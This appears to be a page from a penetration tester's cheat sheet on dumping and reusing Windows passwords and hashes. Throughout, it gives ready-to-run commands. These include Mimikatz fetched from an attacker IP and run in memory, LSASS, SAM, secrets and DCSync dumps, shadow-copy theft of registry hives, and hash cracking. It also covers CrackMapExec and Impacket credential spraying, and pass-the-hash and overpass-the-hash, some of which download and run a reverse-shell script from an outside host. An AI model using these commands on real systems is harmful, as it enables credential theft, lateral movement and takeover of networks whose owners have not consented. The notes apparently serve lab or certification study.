Password hash dump and reuse

PreviousDCOM P.664 / AD DCOM .one NextImpersonating token & pivot

Last updated 2 years ago

Password hash dump and reuse

Can use to PTH RDP

Local logon password dump

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1


powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords" "lsadump::sam" "exit"'

mimikatz.exe (need high integrity)

crackmapexec smb/mssql 1.1.1.1 -u Administrator -p 'Pwd' -M mimikatz -o COMMAND='privilege::debug'
-H nthash

token::elevate
#to elevate the security token from high integrity (administrator) to SYSTEM integrity (no need if mimikatz launch from SYSTEM shell)

dump from memory LSASS

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

dump from SAM

lsadump::sam

.\mimikatz.exe "lsadump::secrets" "exit"

.\mimikatz64.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets" "exit"

crack

john --wordlist=/usr/share/wordlists/rockyou.txt ntlmhash.txt --format=NT

CME dump hashes remotely (with local admin creds/hash)

#lsass
crackmapexec smb 172.16.1.100 -u admin -p 'pwd' -M lsassy --local-auth
(-d if domain user is local admin)

#sam
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
(-H nthash)

Impacket dump all user password from SAM

useful when having admin shell but no account creds, to get local admin hash for pth

victim

reg save HKLM\SAM .\SAM
reg save HKLM\SYSTEM .\SYSTEM

kali

impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM

with admin creds can dump from kali remote

impacket-secretsdump kudos.local/user:pwd@192.168.200.158
or user@ip -hashes :nthash

secretsdump.py domain.local/'dcadmin'@10.1.1.1 -hashes :nthash -dc-ip 10.1.1.1

crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord! --sam
(-p -> -H :nthash)

alt

powershell.exe -nop -exec bypass -c "IEX(New-Object Net.Webclient).DownloadString('http://172.16.1.30/Invoke-PowerDump.ps1'); Invoke-Powerdump"

When have admin but not accessible SAM & SYSTEM, create a shadow copy and dump

wmic shadowcopy call create Volume='C:\'
vssadmin.exe list shadows
(check shadow copy volume path eg \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3)

mkdir C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM

cd C:\temp && dir

if no admin priv, may try look for .OLD SAM & SYSTEM

commonly in C:\Windows\System32\Config, C:\Windows\System32\Repair, or C:\Windows\System32\Config\Regback


cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK

icacls C:\Windows\System32\Config\SYSTEM.OLD
icacls C:\Windows\System32\Config\SAM.OLD
cp C:\Windows\System32\Config\SYSTEM.OLD C:\tmp
cp C:\Windows\System32\Config\SAM.OLD C:\tmp

cd C:\tmp && dir

Domain password dump

/user:target e.g. built-in domain admin acct Administrator; or /all

.\mimikatz.exe "lsadump::dcsync /user:Administrator (/csv)" "exit"

Check where the credentials can be used

(Pwned = admin on the machine)
smb <-> winrm

crackmapexec smb 192.168.200.0/24 -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth

crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord!

crackmapexec smb 172.16.1.100 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth --continue-on-success

(check against DC, pwned = own with psexec)
crackmapexec smb 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5f
crackmapexec winrm 172.16.1.5 -u nessex -H 0d53464368d5e2b607cd68ea29a8cc5f

CME PtH for rev

(-p password) (-x cmd -X ps)
crackmapexec smb 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -X "iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"

NTLM PtH with local Administrator / AD user (not applicable to kerberos)

works with local admin right, 445

pth-winexe -U
Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e
//10.11.0.22 "powershell.exe -c iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"

pth-winexe - U username%lmhash:nthash //{host} command

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 domain.local/Administrator@192.168.221.57 

may only use the :NThash part

NTLM -> TGT Overpass the hash - gain tickets as specific users (other logoned local admin)

works with local admin right

#TGT only can use on the machine that it was created

after sekurlsa::logonpasswords

sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
klist

(.\mimikatz.exe "sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:shell.exe" "exit"

NTLM -> TGT
#in new shell
net use \\dc01 (or any cmd that requires domain permissions and would subsequently initiate TGS)

klist

TGT -> RCE 
.\psexec.exe \\dc01 cmd.exe -accepteula (or -d -c C:\temp\shell.exe if placed in pivoter)
ipconfig && whoami

No SMB Winrm